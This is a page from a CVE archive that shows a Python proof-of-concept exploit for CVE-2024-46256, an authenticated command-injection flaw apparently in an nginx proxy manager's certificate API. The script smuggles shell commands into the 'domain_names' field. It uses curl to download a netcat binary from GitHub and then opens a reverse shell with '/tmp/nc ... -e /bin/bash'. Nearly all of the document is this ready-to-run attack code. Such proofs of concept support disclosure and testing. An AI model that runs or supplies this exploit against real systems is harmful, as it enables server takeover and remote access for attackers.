4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-46256
README.md
Rendering markdown...
POC / POC_CVE-2024-46256.py PY
⬇ Raw GitHub ✕ Close 
import requests

# Proxy settings (Burp Suite for monitoring requests)
# PROXY = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
TIMEOUT = 60  # Timeout for requests

# Function to generate HTTP headers with optional token
def get_headers(url, token=None):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/json; charset=UTF-8",
        "Authorization": f"Bearer {token}" if token else "Bearer null",
        "Origin": url,
        "Connection": "close",
        "Referer": f"{url}/login",
    }
    return headers

# Login function to obtain authentication token
def login(url):
    username = input("[+] Enter username: ")
    pwd = input("[+] Enter password: ")
    json_data = {"identity": username, "secret": pwd}
    
    try:
        response = requests.post(f"{url}/api/tokens", headers=get_headers(url), json=json_data,  timeout=TIMEOUT)
        response.raise_for_status()  # Raise exception for bad responses
        token = response.json().get("token")
        print(f"[+] Token obtained: {token}")
        return token
    except requests.RequestException as e:
        print(f"[-] Login failed: {e}")
        return None

# Function to execute RCE using crafted payload
def execute_rce(url, token, cmd):
    json_data = {
        "domain_names": [f'test.com"||{cmd}||\\\\n test.com"'],
        "meta": {
            "dns_challenge": False,
            "letsencrypt_agree": True,
            "letsencrypt_email": "[email protected]",
        },
        "provider": "letsencrypt",
    }

    try:
        res = requests.post(f"{url}/api/nginx/certificates", headers=get_headers(url, token), json=json_data,  timeout=TIMEOUT)
        print(f"[+] Command executed: {cmd}")
    except requests.RequestException as e:
        pass
    return res.status_code
# Function to perform the full RCE exploitation flow
def rce_exploit(url, token):
    payloads = [
        'curl https://raw.githubusercontent.com/yunchih/static-binaries/master/nc -o /tmp/nc',
        'chmod +x /tmp/nc'
    ]
    
    # Send initial payloads to prepare the environment
    for payload in payloads:
        print(f"[+] Sending payload: {payload}")
        status_code = execute_rce(url, token, payload)

    # Check vulnerability
    if status_code == 400:
        print("[+] Target is vulnerable!")
        if input("[+] Proceed with reverse shell? (y/n): ").lower() == "y":
            rev_url = input("[+] Enter reverse shell IP: ")
            rev_port = input("[+] Enter reverse shell port: ")
            cmd = f"/tmp/nc {rev_url} {rev_port} -e /bin/bash"
            execute_rce(url, token, cmd)
            print("[+] Reverse shell command executed!")
        else:
            print("[+] Exploit aborted.")
    else:
        print("[-] Target is not vulnerable.")

# Main function for user input and launching the exploit
def main():
    target_type = input("[+] Target type (IP/Host)? (i/h): ").lower()
    ip_or_host = input("[+] Enter IP or Host: ")
    port = input("[+] Enter Port: ") if target_type == "i" else ""
    url = f"http://{ip_or_host}:{port}" if port else f"http://{ip_or_host}"

    token = login(url)
    if token:
        rce_exploit(url, token)

if __name__ == "__main__":
    main()